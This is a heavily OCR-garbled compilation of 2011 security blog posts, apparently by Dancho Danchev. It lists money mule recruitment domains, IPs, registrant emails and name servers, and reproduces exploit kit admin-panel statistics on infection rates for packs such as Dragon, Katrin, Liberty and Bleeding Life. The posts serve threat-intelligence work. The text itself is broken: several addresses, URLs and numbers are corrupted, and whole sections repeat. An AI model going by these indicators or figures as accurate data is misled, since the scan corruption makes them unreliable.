admin@condor-llc-uk.net 

CONTEMP-USAINC.COM - 184.168.64.173 - Email: 
admin@contemp-usainc.com 



CONTEMP-USGROUP.COM - 184.168.64.173 - Email: 
admin@contemp-usgroup.com 

DE-KADEGROUP.CC - 193.105.134.230 - Email: 
cents@mailae.com 

DERWOODE-GROUP.CC - 98.141.220.115 - Email: 
web@derwoode-group.cc 

ELENTY-CO.NET - 184.168.64.173 - Email: abcs@mailti.com 

ELENTY-LLC.COM - 184.168.64.173 - Email: admin@elenty- 
llc.com 

GAPSONART.NET - 184.168.64.173 - Email: 
admin@gapsonart.net 

GLACIS-GROUPUK.NET - 78.46.105.205 - Email: 
admin@glacis-groupuk.net 

GURU-GROUP.CC - 184.168.64.173 - Email: admin@guru- 
group.cc 

GURU-GROUP.NET - 184.168.64.173 - Email: 
jj@cutemail.org 

INTECHTODEX-GROUP.COM - 184.168.64.173 - Email: 
uq@maill3.com 

INTEGRATED-EUROPE-IT.NET 78.46.105.205 - Email: 
admin@integrated-europe-it.net 
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ITAGROUP-USA.NET - 98.141.220.117 - Email: 
admin@itagroup-usa.net 



IT-ANALISYS.COM - 98.141.220.115 - Email: 
yea@mailae.com 

ITANALYSISGROUP.NET - 98.141.220.116 - Email: 
admin@itanalysisgroup.net 

KADE-GROUPDE.NET - 78.46.105.205 - Email: 
zigzag@fxmail.net 

MASTERARTUSA.COM - 98.141.220.114 - Email: 
day@mailae.com 

NARTEN-ART.COM - 209.190.4.91 - Email: 
glamor@fxmail.net 

NARTENART.NET - 209.190.4.91 - Email: 
admin@nartenart.net 

quad-groupuk.cc - 78.46.105.205 - Email: 
prissy@mailae.com 

REFINEMENT-ANTIQUE.COM - 184.168.64.173 - Email: 
xe@fxmail.net 

SCAR-BEIINC.COM - 184.168.64.173 - Email: admin@scar- 
beiinc.com 

SKYLINE-ANTIQUE.COM - 209.190.4.91 - Email: 
blurs@mailae.com 

SKYLINE-LTD.NET - 209.190.4.91 - Email: admin@skyline- 
ltd.net 

SMARTLLC-UK.COM - 193.105.134.234 - Email: 
admin@smartllc-uk.com 

SMART-LLC-UK.NET - 193.105.134.233 - Email: 
pol@mailae.com 



SPECIAL-ARTUK.COM - 193.105.134.232 - Email 
admin@special-artuk.com 

SUBLIMELTD.COM - 98.141.220.118 - Email: 
admin@sublimeltd.com 

TODEX-GROUP.NET - 184.168.64.173 - Email: 
admin@todex-group.net 
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NARTEN-ART.COM 

209.190.4.91 

NARTENART.NET 

209.190.4.91 

SKYLINE-ANTIQUE.COM 

209.190.4.91 

SKYLINE-LTD.NET 

209.190.4.91 

SMARTLLC-UK.COM 

193.105.134.234 

COMPLETE-ART-GROUP-LTD.COM 

193.105.134.233 

C0ND0R-LLC-UK.NET 

193.105.134.233 

SMART-LLC-UK.NET 

193.105.134.233 

COMPLETE-ART-UK.NET 

193.105.134.232 

SPECIAL-ARTUK.COM 

193.105.134.232 

CONDORLLC-UK.COM 

193.105.134.231 

DE-KADEGROUP. CC 

193.105.134.230 

ACWOODE-GROUP.COM 

184.168.64.173 

ACW00DE-GR0UP.NET 

184.168.64.173 

CONTEMP-USAINC.COM 

184.168.64.173 

CONTEMP-USGROUP. COM 

184.168.64.173 

ELENTY-CO.NET 

184.168.64.173 

ELENTY-LLC.COM 

184.168.64.173 

GAPSONART.NET 

184.168.64.173 

GURU-GROUP. CC 

184.168.64.173 

GURU-GROUP.NET 

184.168.64.173 

INTECHTODEX-GROUP. COM 

184.168.64.173 

REFINEMENT-ANTIQUE.COM 

184.168.64.173 

SCAR-BEIINC.COM 

184.168.64.173 

TODEX-GROUP.NET 

184.168.64.173 

SUBLIMELTD.COM 

98.141.220.118 

ITAGROUP-USA.NET 

98.141.220.117 

ITANALYSISGROUP.NET 

98.141.220.116 

DERWOODE-GROUP.CC 

98.141.220.115 

IT-ANALISYS.COM 

98.141.220.115 

MASTERARTUSA.COM 

98.141.220.114 

ART-GROUPINTEGRETED.COM 

78.46.105.205 

ARTINTEGRATED-GROUP .NET 

78.46.105.205 

GLACIS-GROUPUK.NET 

78.46.105.205 

INTEGR ATED-EUROPE-IT. NET 

78.46.105.205 

KADE-GROUPDE.NET 

78.46.105.205 

quad-qroupuk,cc 

78.46.105.205 



The domains reside within the following ASs: AS10297, 
RoadRunner RR-RC; AS42708; PORTLANE Network; AS26496; 

GODADDYcom; AS29713, INTERPLEXINC; AS24940, 
HETZNER-AS Hetzner Online. 

Name servers of notice: 

NS1.MKNS.SU - 85.25.250.244 - Email: mkns@cheapbox.ru 
NS2.MKNS.SU - 46.4.148.119 
NS3.MKNS.SU - 184.82.158.76 

NS1.MLDNS.SU - 85.25.145.63 - Email: mldns@free-id.ru 

NS2.MLDNS.SU - 46.4.148.74 

NS3.MLDNS.SU - 184.82.158.74 

NS1.MNAMEDL.SU - 85.25.250.211 - Email: 
mnamed@yourisp.ru 

NS2.MNAMEDL.SU - 46.4.148.118 

NS3.MNAMEDL.SU - 184.82.158.75 

NS1.DNSUS.SU - 217.23.15.137 - Email: wifi@yourisp.ru 

NS2.DNSUS.SU - 87.118.81.7 
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NS3.DNSUS.SU - 87.118.81.10 

NS1.NAMEUSNS.SU - 217.23.15.138 - Email: Iavier@bz3.ru 

NS2.NAMEUSNS.SU - 84.19.161.7 



NS3.NAMEUSNS.SU - 84.19.161.10 


NS1.USDENNS.SU - 217.23.15.136 - Email: lipstick@free- 
id.ru 

NS2.USDENNS.SU - 84.19.161.7 

NS3.USDENNS.SU - 84.19.161.10 

NS1.NAMESUKNS.CC - 86.55.210.4 - Email: pal@bz3.ru 

NS2.NAMESUKNS.CC - 193.105.134.232 

NS3.NAMESUKNS.CC - 193.105.134.237 

NS1.NAMEUK.AT - 86.55.210.5 - Email: admin@nameuk.at 

NS2.NAMEUK.AT 193.105.134.233 

N S3. NAME UK. AT 193.105.134.236 

NS1.UKDNSTART.NET 86.55.210.5 - Email: 
admin@ukdnstart.net 

NS2.UKDNSTART.NET 193.105.134.233 

NS3.UKDNSTART.NET 193.105.134.236 

NSl.DENDRUYOS.NET 86.55.210.4 - Email: 
admin@dendruyos.net 

NS2.DENDRUYOS.NET 193.105.134.232 

NS3.DENDRUYOS.NET 193.105.134.237 

NS1.DEDNSAUTH.NET 86.55.210.2 - Email: 
admin@dednsauth.net 

NS2.DEDNSAUTH.NET 193.105.134.230 



NS3.DEDNSAUTH.NET - 193.105.134.239 


NS1.DELTOPOOR.AT - 86.55.210.3 - Email: 
admin@deltopoor.at 

NS2.DELTOPOOR.AT - 193.105.134.231 

NS3.DELTOPOOR.AT - 193.105.134.238 

Monitoring of ongoing money mule recruitment campaigns is 
ongoing. 

Related posts: 

[2] Keeping Money Mule Recruiters on a Short Leash - Part 
Nine 

[3] Keeping Money Mule Recruiters on a Short Leash - Part 
Eight - Historical OSINT 

[4] Keeping Money Mule Recruiters on a Short Leash - Part 
Seven 

[5] Keeping Money Mule Recruiters on a Short Leash - Part Six 

[6] Keeping Money Mule Recruiters on a Short Leash - Part 
Five 

[7] The DNS Infrastructure of the Money Mule Recruitment 
Ecosystem 

[8] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 

[9] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 



[10] Keeping Money Mule Recruiters on a Short Leash - Part 
Three 

[11] Money Mule Recruiters on Yahool's Web Hosting 

[12] Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[13] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[14] Keeping Reshipping Mule Recruiters on a Short Leash 

[15] Keeping Money Mule Recruiters on a Short Leash 

[16] Standardizing the Money Mule Recruitment Process 

[17] lnside a Money Laundering Group's Spamming 
Operations 

[18] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[19] Money Mules Syndicate Actively Recruiting Since 2002 

This post has been reproduced from [20]Dancho 
Danchev's blog. 
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10. http://ddanchev.blo as pot.com/2010/Q3/keepin a -mone v- 
mule-recruiters-on-short.html 


11. http://ddanchev.blo as pot.com/2010/Q3/monev-mule- 
recruifers-on-vahoos-web.html 

12. http://ddanchev.blo as pot.com/2010/Q2/dissectin a- 
on a oin a -monev-mule.html 

13. http://ddanchev.blo as pot.com/2010/Q2/keepin a -mone v- 
mule-recruiters-on-short.html 


14. http://ddanchev.blo as pot.com/20Q9/12/keepin a- 
reshi p pin a -mule-recruiters-on.html 

15. http://ddanchev.blo as pot.com/20Q9/ll/keepin a -mone v- 
mule-recruiters-on-short.html 


16. http://ddanchev.blo as pot.com/20Q9/10/standardizin a- 
monev-mule-recruitment.html 


























































17. http://ddanchev.blo as pot.com/2009/Q5/inside-mone v- 
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18. http://ddanchev.blo as pot.com/2008/Q7/monev-mule- 
recruiters-use-asproxs-fast.html 

19. http://ddanchev.blo as pot.com/20Q8/10/monev-mules- 
s vndicate-activelv.html 

20. http://ddanchev.blo as pot.com/ 
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Kaspersky: 12 different vulnerabilities detected 
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New malware attack circulating on Facebook 
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latest m 
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Summarizing ZDNet's Zero Day Posts for July (2011- 
08-22 18:06) 

The following is a brief summary of all of my posts at ZDNet's 
Zero Day for July. You can subscribe to my [ljpersonal RSS 
feed, [2]Zero Day's main feed, or follow me on Twitter: 

01.[3]'l_eaked Video of Casey Anthony CONFESSING to 
Lawyer!' scam spreading on Facebook 

02. [4]Anonymous leaks 90,000+ emails from compromised 
military contractor Booz Allen Flamilton 








03. [5]'This girl must be Out of her Mind to do this on live 
Television!' scam spreading on Facebook 

04. [6]Spamvertised bank statements serving scareware 

05. [7]lnternet Explorer 9 outperforms competing browsers in 
malware blocking test 

06.[8]'Leaked Video! Amy Winehouse on Crack hours before 
death' scam spreading on Facebook 

07.[9]Pfizer's Facebook hacked by AntiSec 

08. [10]90,000+ pages compromised in mass iFrame 
injection attack 

09. [lljAmazon's cloud services systematically exploited by 
cybercriminals 

This post has been reproduced from [12]Dancho 
Danchev's blog. Follow him [13]on Twitter. 
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STATISTICS 


UNICS 

WINDOWS LOADS 


PERCENT 

583 

486 45 


9.26% 

EXPLOIT 

RUN 

RATE 

JAVAROX 

42 

93.33 

JAVASMB 

2 

4.44 

MDAC 

1 

2.22 

BROWSER 

VISITS LOADS 


RATE 

MSIE6 

6 1 

16.67% 

MSIE7 

49 3 

6.12% 

MSIE8 

187 13 

6.95% 

Chrome 

65 7 

10.77% 

Firefox 

209 20 

9.57% 

Opera 

6 0 

0% 

Safari 

57 0 

0% 

Other 

6 0 

0% 

OS 

VISITS LOADS 


RATE 

Windows 95 

1 1 

100% 

Windows 2000 

1 0 

0% 

Wndows XP 

175 14 

8% 

Windows XP SP2 

22 3 

13.64% 

Windows Vista 

146 12 

8.22% 

Windows 7 

141 15 

10.64% 


A Peek Inside Web Malware Exploitation Kits (2011- 
08-29 13:19) 

With web malware exploitation kits, continuing to represent 
the attack method of choice for the majority of 

cybercriminals thanks to the [ljoverall susceptibility of end 
and [2]enterprise users to client-side exploitation attacks, it's 
always worth taking a peek inside them from the perspective 
of the malicious attacker. 

In this post, we'll take a peek inside three web malware 
exploitation kits, and discuss what makes them think 











in terms of infected OSs, browser plugins and client-side 
exploits. 

Dragon Pack Web Malware Exploitation Kit 

[3] 

What we've got here is a rather modest in terms of activity, 
web malware exploitation kit admin panel. We've got 

45 successful loads based on 588 unique visits, with the 
JavaRox exploit executed 42 times, successfully infecting 

20 Firefox users. The exploits have successfully loaded on 
Windows XP 14 times, on Windows XP SP2 3 times, on 

Windows Vista 12 times, and on Windows 7 15 times. 

Dragon Exploit Pack 
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STATISTICS 










UN ICS WINDOWS LOAD5 PERCENT 

587 

486 

45 


9.26% 


EXPLOIT 

RUN 


RATE 



JAVAJDK 

42 


9333 



MVASMB 

2 


4.44 



MDAC 

1 


2.22 



MSIE 6 

6 

1 


16.67% 


MSIE 7 

49 

3 


6.12% 


MSIE 8 

187 

13 


6.95% 


Chrome 

65 

7 


10.77% 


Firefox 

209 

20 


9.S7% 


Opera 

6 

0 


0% 



57 

0 


0% 


Other 

s 

0 


0% 


OS 

VISITS 

LOADS 


RATE 


Windows 9b 

1 

1 


100% 


Windows 2000 

1 

0 


0% 


Windows XP 

175 

14 


8% 


Windows XPSP2 

22 

3 


13.64% 


Windows Vista 

146 

12 


8.22% 


Windows 7 

141 

15 


10.64% 



The Dragon Exploit Pack has 45 successful loads based on 
587 unique visitors, with the JavaJDK exploit executed 

successfully 42 times. The kit is counting 13 successful loads 
on MSIE 8, and another 20 on Firefox, with 14 successful 
loads recorded for Windows XP, 2 on Windows XP SP2, 12 on 
Windows Vista and 15 on Windows 7. 

Katrin Exploit Pack 
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KATRIN 


Bl 


TRAFFIC 


Java JSM 
Java SMB 
JavaOBE 
Old 4 PDF 
Lib tiff PDF 
MDAC 
Snapshot 
HCP 


. WINDOWS TRAFFIC i LOADS 


; LOADS 

; RATE 

JJJ 

16.33% 


17.58% 

■914 

' 27.89% 

87 

2.65% 

726 

22.15% 

96 

' 2.93% 

104 

3.17% 

239 

7.29% 



j TRAFFIC 

HS53 

IRATE 1 

MSIE 6 

1315 

452 

34.37% 

MSIE 7 

2403 

786 

32.64% 

MSIE 8 

8162 

1198 

: 14.68% 

MSIE 9 

89 

6 

6.74% 

Chrome 

] 2559 

274 

10.71% 

Firefbx 

4499 

522 

11.6% 

Opera 

209 

24 

11.48% 

Safari 

542 

14 

2.58% 

Other 

' ISO 

1 

0.67% 

os 

TRAFFIC 

• LOADS 

IRATE 

Windows 98 

23 

7 

, 30.43% 

Windows 2000 

38 

■9 

23.68% 

Windows 2003 

^33 

7 

' 21.21% 

Windows XP 

10648 

2107 

19.79% 

Windows Vista 

2724 

625 

22.94% 

Windows 7 

5451 

503 

9.23% 

Other OS 

1016 


’ 1,87% 


The Katrin Exploit Pack has 3277 successful loads based on 
19933 unique visits, which represents a 17.32 % infection 

rate. The Java JSM exploit has been successfully loaded 535 
times, Java SMB has been loaded 576 times, Java OBE 

has been loaded 914 times, Old 4 PDF has been loaded 87 
times, Libtiff PDF has been loaded 726 times, MDAC has 

been loaded 96 times, Snapshot has been loaded 104 times, 
and FICP has been loaded 239 times. 

The kit is counting 452 successful exploitation attempts 
against MSIE 5, 786 against MSIE7, 1198 against MSIE 










8, 274 against Chrome, 522 against Firefox, 24 against Opera 
and 14 against Safari. The majority of loads have 

affected Windows XP installations, with 2107 successful 
loads targeting the OS, following 625 on Windows Vista, and 

503 on Windows 7. 

Liberty Exploit Pack 
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in 


in 


H 


V 


17% • E7 



Browser 

Uniques 

Downloads 

Percent 

Total (100 %) 

3029 

555 

16.32 % 

IE 6 (37X17 %) 

1123 

397 

35.35 % (13.11 %) 

IE 7 (30.S7 %) 

326 

69 

9.61 % (2.94 %) 

FWetfox <16.64 %) 

504 

54 

10.71% (1.76 %) 

Unknown (11.03 %) 

360 

2 

0.56 % (0jO7 %) 

Chrome (2.01 %) 

61 

9 

14.75% (0.3%) 

Opera <1.62 %) 

55 

4 

7.27 % (043 %) 


The Liberty Exploit pack screenshot, is showing the 
proportion successfully infected web browsers, with total of 
555 

successful loads based on 3029 unique visitors. 397 loads 
have affected Internet Explorer 6, 89 Internet Explorer 7, 


and 54 Firefox. 


Bleeding Life Exploit Pack 
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In this Bleeding Life web malware exploitation kit, we can 
clearly seen the dynamics behind the infections taking 












place. We see 554 successful loads based on 4106 unique 
visitors. JavaSignedApplet has been executed 161 times, 

Adobe-90-2010-0188 has been executed 67 times, Adobe- 
80-2010-0188 has been executed 46 times, Java-2010- 

0842 has been executed 203 times, Adobe-2008-2992 has 
been executed 74 times, and Adobe-2010-1297 has been 

executed 2 times. 

The majority of the infected population is based in the U.S, 
United Kingdom, Qatar, and Malaysia. Windows 

XP has the highest market share of infected OSs, with 336 
successful loads based on 2098 unique visitors. Followed 

by Windows 7 with 139 loads based on 1256 unique visitors, 
and 73 unique loads based on 719 unique visitors for 

Windows Vista. 

This post has been reproduced from [4]Dancho 
Danchev's blog. Follow him [5]on Twitter. 

1. http://www.zdnet.com/blo a /securitv/56-percent-of- 
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2. http://www.zdnet.com/blo a /securitv/kasperskv-12- 
different-vulnerabilities-detected-on-ever v- pc/9283 

3. http://2.bp.blo as pot.com/- 
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4. http://ddanchev.blo as pot.com/ 

5. http://twitter.com/danchodanchev 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Eleven (2011-08-29 15:51) 

The following intelligence brief is part of the [l]Keeping 
Money Mule Recruiters on a Short Leash series. In it, 

I'll expose currently active money mule recruitment domains, 
their domain registration details, currently responding 

IPs, and related ASs. 

Money mule recruitment domains: 
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fabia-art.com 


209.190.4.91 

fine-artgroup.com 


209.190.4.91 

ltd-scg.net 


209.190.4.91 

gmd-contracting.com 


194.2422.56 

techce-group.com 


184.168.64.173 

triad-webs.com 


85.17.24.226 

ACWOODE-GROUP.COM 


78.46.105.205 

ACW00DE-GR0UP.NET 


78.46.105.205 

ART-GAPSON.COM 


78.46.105.205 

ELENTY-LLC.COM 


78.46.105.205 

GAPSONART.NET 


78.46.105.205 

GURU-GROUP.CC 


78.46.105.205 

78.46.105.205 

GURU-GROUP.NET 


INTECHTODEX-GROUP.COM 

78.46.105.205 

NARTEN-ART.COM 

NARTENART.NET 


78.46.105.205 

78.46.105.205 

panart-llc.com 


78.46.105.205 

RERNEMENT-ANT1QUE.COM 

78.46.105.205 

RERNEMENTUK-LTD.NE 


78.46.105.205 

SKYUNE-ANTIQUE.COM 


78.46.105.205 

SKYUNE-LTD.NET 


78.46.105.205 

T0DEX-GR0UP.NET 


78.46.105.205 

CONDOR-LLC-UK.NET 



CONDORLLC-UK.COM 



DE-DVFGROUP.BE 



1 ELENTY-CO.NET i 


ACWOODE-GROUP.COM - 78.46.105.205 - Email: 
admin@acwoode-group.com 

ACWOODE-GROUP.NET - 78.46.105.205 - Email: 
admin@acwoode-group.net 

ART-GAPSON.COM - 78.46.105.205 - Email: admin@art- 
gapson.com 

CONDOR-LLC-UK.NET - Email: admin@condor-llc-uk.net 
CONDORLLC-UK.COM - Email: plods@fxmail.net 

DE-DVFGROUP.BE 

ELENTY-CO.NET - Email: abcs@mailti.com 



ELENTY-LLC.COM - 78.46.105.205 - Email: admin@elenty- 
llc.com 

fabia-art.com - 209.190.4.91 - Email: adios@cutemail.org 

fine-artgroup.com - 209.190.4.91 

GAPSONART.NET - 78.46.105.205 - Email: 
admin@gapsonart.net 

gmd-contracting.com - 194.242.2.56 - Email: 
admin@gmd-contracting.com 

GURU-GROUP.CC - 78.46.105.205 - Email: admin@guru- 
group.cc 

GURU-GROUP.NET - 78.46.105.205 - Email: jj@cutemail.org 

INTECHTODEX-GROUP.COM - 78.46.105.205 - Email: 
uq@maill3.com 

ltd-scg.net - 209.190.4.91 - Email: amykylir@yahoo.com 

NARTEN-ART.COM - 78.46.105.205 - Email: 
glamor@fxmail.net 

NARTENART.NET - 78.46.105.205 - Email: 
admin@nartenart.net 

panart-llc.com - 78.46.105.205 - Email: admin@panart- 
llc.com 

REFINEMENT-ANTIQUE.COM - 78.46.105.205 - Email: 
xe@fxmail.net 

REFINEMENTUK-LTD.NET - 78.46.105.205 - Email: 
admin@refinementuk-ltd.net 



SKYLINE-ANTIQUE.COM - 78.46.105.205 - Email: 
blurs@mailae.com 

SKYLINE-LTD.NET - 78.46.105.205 - Email: admin@skyline- 
ltd.net 
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techce-group.com - 184.168.64.173 - Email: 
admin@techce-group.com 


TODEX-GROUP.NET - 78.46.105.205 - Email: admin@todex- 
group.net 

triad-webs.com - 85.17.24.226 

The domains reside within the following ASs: AS24940, 
HETZNER-AS Hetzner Online AG RZ; AS16265, LeaseWeb 
B.V. 

Amsterdam; AS26496, GODADDY .com, Inc.; AS10297, 
RoadRunner RR-RC-Enet-Columbus. 
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5b 4 be.staticxlhost.com 

PTR 

tabiaait.com 

fabia-arl net 

fabiaart-ltd com 

fabiaart-usa.com 

tlne-artgroup com 

fineart-group com 

flash-ukllc.com 

guru-co net 

mx.fabla-artnet 

mxfabiaart-usacom 

m* tine artgroup com 

mxtineart- group com 

mx.guru-co.net 

panarlllc.net 

skyline-antique.com 

skyline-ltd.net 


a 



209.190.0.0/17 


AS10297 


Name servers of notice: 

NS1.MKNS.SU - 85.25.250.244 - Email: mkns@cheapbox. 
NS2.MKNS.SU - 46.4.148.119 
NS3.MKNS.SU - 184.82.158.76 


NS1.MNAMEDL.SU - 85.25.250.211 - Email: 
mnamed@yourisp.ru 

NS2.MNAMEDL.SU - 46.4.148.118 

NS3.MNAMEDL.SU - 184.82.158.75 

NS1.MLDNS.SU - 85.25.145.63 - Email: mldns@free-id.ru 

NS2.MLDNS.SU - 46.4.148.74 

NS3.MLDNS.SU - 184.82.158.74 

NS1.NAMESUKNS.CC - Email: pal@bz3.ru 

NS2.NAMESUKNS.ee 

NS3.NAMESUKNS.ee 

NS1.NAMEUK.AT - Email: admin@nameuk.at 
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NS2.NAMEUK.AT 

NS3.NAMEUK.AT 

NS1.UKDNSTART.NET - Email: admin@ukdnstart.ne 

NS2.UKDNSTART.NET 

NS3.UKDNSTART.NET 

Monitoring of ongoing money mule recruitment campaigns is 
ongoing. 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Eleven (2011-08-29 15:51) 

The following intelligence brief is part of the [l]Keeping 
Money Mule Recruiters on a Short Leash series. In it, 

I'll expose currently active money mule recruitment domains, 
their domain registration details, currently responding 

IPs, and related ASs. 

Money mule recruitment domains: 
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fabia-art.com 


209.190.4.91 

fine-artgroup.com 


209.190.4.91 

ltd-scg.net 


209.190.4.91 

gmd-contracting.com 


194.2422.56 

techce-group.com 


184.168.64.173 

triad-webs.com 


85.17.24.226 

ACWOODE-GROUP.COM 


78.46.105.205 

ACW00DE-GR0UP.NET 


78.46.105.205 

ART-GAPSON.COM 


78.46.105.205 

ELENTY-LLC.COM 


78.46.105.205 

GAPSONART.NET 


78.46.105.205 

GURU-GROUP.CC 


78.46.105.205 

78.46.105.205 

GURU-GROUP.NET 


INTECHTODEX-GROUP.COM 

78.46.105.205 

NARTEN-ART.COM 

NARTENART.NET 


78.46.105.205 

78.46.105.205 

panart-llc.com 


78.46.105.205 

RERNEMENT-ANT1QUE.COM 

78.46.105.205 

RERNEMENTUK-LTD.NE 


78.46.105.205 

SKYUNE-ANTIQUE.COM 


78.46.105.205 

SKYUNE-LTD.NET 


78.46.105.205 

T0DEX-GR0UP.NET 


78.46.105.205 

CONDOR-LLC-UK.NET 



CONDORLLC-UK.COM 



DE-DVFGROUP.BE 



1 ELENTY-CO.NET i 


ACWOODE-GROUP.COM - 78.46.105.205 - Email: 
admin@acwoode-group.com 

ACWOODE-GROUP.NET - 78.46.105.205 - Email: 
admin@acwoode-group.net 

ART-GAPSON.COM - 78.46.105.205 - Email: admin@art- 
gapson.com 

CONDOR-LLC-UK.NET - Email: admin@condor-llc-uk.net 
CONDORLLC-UK.COM - Email: plods@fxmail.net 

DE-DVFGROUP.BE 

ELENTY-CO.NET - Email: abcs@mailti.com 



ELENTY-LLC.COM - 78.46.105.205 - Email: admin@elenty- 
llc.com 

fabia-art.com - 209.190.4.91 - Email: adios@cutemail.org 

fine-artgroup.com - 209.190.4.91 

GAPSONART.NET - 78.46.105.205 - Email: 
admin@gapsonart.net 

gmd-contracting.com - 194.242.2.56 - Email: 
admin@gmd-contracting.com 

GURU-GROUP.CC - 78.46.105.205 - Email: admin@guru- 
group.cc 

GURU-GROUP.NET - 78.46.105.205 - Email: jj@cutemail.org 

INTECHTODEX-GROUP.COM - 78.46.105.205 - Email: 
uq@maill3.com 

ltd-scg.net - 209.190.4.91 - Email: amykylir@yahoo.com 

NARTEN-ART.COM - 78.46.105.205 - Email: 
glamor@fxmail.net 

NARTENART.NET - 78.46.105.205 - Email: 
admin@nartenart.net 

panart-llc.com - 78.46.105.205 - Email: admin@panart- 
llc.com 

REFINEMENT-ANTIQUE.COM - 78.46.105.205 - Email: 
xe@fxmail.net 

REFINEMENTUK-LTD.NET - 78.46.105.205 - Email: 
admin@refinementuk-ltd.net 



SKYLINE-ANTIQUE.COM - 78.46.105.205 - Email: 
blurs@mailae.com 

SKYLINE-LTD.NET - 78.46.105.205 - Email: admin@skyline- 
ltd.net 
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techce-group.com - 184.168.64.173 - Email: 
admin@techce-group.com 


TODEX-GROUP.NET - 78.46.105.205 - Email: admin@todex- 
group.net 

triad-webs.com - 85.17.24.226 

The domains reside within the following ASs: AS24940, 
HETZNER-AS Hetzner Online AG RZ; AS16265, LeaseWeb 
B.V. 

Amsterdam; AS26496, GODADDY .com, Inc.; AS10297, 
RoadRunner RR-RC-Enet-Columbus. 
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5b 4 be.staticxlhost.com 

PTR 

tabiaait.com 

fabia-arl net 

fabiaart-ltd com 

fabiaart-usa.com 

tlne-artgroup com 

fineart-group com 

flash-ukllc.com 

guru-co net 

mx.fabla-artnet 

mxfabiaart-usacom 

m* tine artgroup com 

mxtineart- group com 

mx.guru-co.net 

panarlllc.net 

skyline-antique.com 

skyline-ltd.net 


a 



209.190.0.0/17 


AS10297 


Name servers of notice: 

NS1.MKNS.SU - 85.25.250.244 - Email: mkns@cheapbox. 
NS2.MKNS.SU - 46.4.148.119 
NS3.MKNS.SU - 184.82.158.76 


NS1.MNAMEDL.SU - 85.25.250.211 - Email: 
mnamed@yourisp.ru 

NS2.MNAMEDL.SU - 46.4.148.118 

NS3.MNAMEDL.SU - 184.82.158.75 

NS1.MLDNS.SU - 85.25.145.63 - Email: mldns@free-id.ru 

NS2.MLDNS.SU - 46.4.148.74 

NS3.MLDNS.SU - 184.82.158.74 

NS1.NAMESUKNS.CC - Email: pal@bz3.ru 

NS2.NAMESUKNS.ee 

NS3.NAMESUKNS.ee 

NS1.NAMEUK.AT - Email: admin@nameuk.at 
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NS2.NAMEUK.AT 

NS3.NAMEUK.AT 

NS1.UKDNSTART.NET - Email: admin@ukdnstart.ne 

NS2.UKDNSTART.NET 

NS3.UKDNSTART.NET 

Monitoring of ongoing money mule recruitment campaigns is 
ongoing. 

Related posts: 

[2]Keeping Money Mule Recruiters on a Short Leash - Part Ten 
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Nine 
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[5] Keeping Money Mule Recruiters on a Short Leash - Part 
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[6] Keeping Money Mule Recruiters on a Short Leash - Part Six 

[7] Keeping Money Mule Recruiters on a Short Leash - Part 
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[8] The DNS Infrastructure of the Money Mule Recruitment 
Ecosystem 

[9] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 

[10] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 

[11] Keeping Money Mule Recruiters on a Short Leash - Part 
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[12] Money Mule Recruiters on Yahool's Web Hosting 

[13] Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[14] Keeping Money Mule Recruiters on a Short Leash - Part 
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[15] Keeping Reshipping Mule Recruiters on a Short Leash 

[16] Keeping Money Mule Recruiters on a Short Leash 



[17]Standardizing the Money Mule Recruitment Process 

[ 18]Inside a Money Laundering Group's Spamming 
Operations 

[19] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 
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Summarizing 3 Years of Research Into Cyber Jihad 
(2011-09-11 13:34) 

On this very special day, I'd like to honor the fallen by 
summarizing my research into cyber jihad, a topic I'm still 
highly passionate about. Enjoy and share it with your social 
circle! 

1. [IjTracking Down Internet Terrorist Propaganda 

2. [2]Arabic Extremist Group Forum Messages' 
Characteristics 

3. [3]Cyber Terrorism Communications and 
Propaganda 

4. [4]A Cost-Benefit Analysis of Cyber Terrorism 

5. [5]Current State of Internet Jihad 

6. [6]Analysis of the Technical Mujahid - Issue One 

7. [7]Full List of Hezbollah's Internet Sites 

8. [8]Steganography and Cyber Terrorism 
Communications 





9. [9]HezboIlah's DNS Service Providers from 1998 to 
2006 

10. [10]Mujahideen Secrets Encryption Tool 

11. [ll]Analyses of Cyber Jihadist Forums and Blogs 

12. [12]Cyber Traps for Wannabe Jihadists 

13. [13]lnshallahshaheed - Come Out, Come Out 
Wherever You Are 

14. [14]GIMF Switching Blogs 

15. [15]GIMF Now Permanently Shut Down 

16. [16]GIMF - "We Will Remain" 

17. [17]Wisdom of the Anti Cyber Jihadist Crowd 

18. [18]Cyber Jihadist Blogs Switching Locations Again 

19. [19]Electronic Jihad v3.0 - What Cyber Jihad Isn't 

20. [20]Electronic Jihad's Targets List 

21. [21]Teaching Cyber Jihadists How to Hack 

22. [22]A Botnet of Infected Terrorists? 

23. [23]lnfecting Terrorist Suspects with Malware 

24. [24]The Dark Web and Cyber Jihad 
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25. [25]Cyber Jihadist Hacking Teams 

26. [26]Two Cyber Jihadist Blogs Now Offline 



27. [27]Characteristics of Islamist Websites 

28. [28]Cyber Traps for Wannabe Jihadists 

29. [29]Mujahideen Secrets Encryption Tool 

30. [30]An Analysis of the Technical Mujahid - Issue 
Two 

31. [31]Terrorist Groups' Brand Identities 

32. [32]A List of Terrorists' Blogs 

33. [33]Jihadists' Anonymous Internet Surfing 
Preferences 

34. [34]Sampling Jihadists' IPs 

35. [35]Cyber Jihadists' and TOR 

36. [36]A Cyber Jihadist DoS Tool 

37. [37]GIMF Now Permanently Shut Down 

38. [38]Mujahideen Secrets 2 Encryption Tool 
Released 

39. [39]Terror on the Internet - Conflict of Interest 
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ZDNet 


Comp »ri»i Hardwire Software M otJi Security 


Special Coverage 



Zero Day 


ZDNet Mutt Read 

Firefox 6 patches lO dangerous security holes 

The abdties are tencut enough to alow an attacker to launc 

software, requmg no user nt erection beyond normal browsmg. 


l» harmful code and mstal 


/Uxxjf Zero Day 
Staymg on too of the 


Russian Embassy in London hit by a DDoS attack 

The Russian embassy w London was he by a ckstrboted dental of 
sernce attack (OOoS) Over the weekend. 

New ransotnware variant uses false child porn 
accusations 


Researcrisrs from BKOefender have detected a new rantomware variant 
curentfy spreadng m trie wid. 

'Man in wheelchair falls down the elevator shaft' 
scam spreading on Facebook 

Researtricrs from Soprios have spotted a cunentri orcvfebng Facebook 
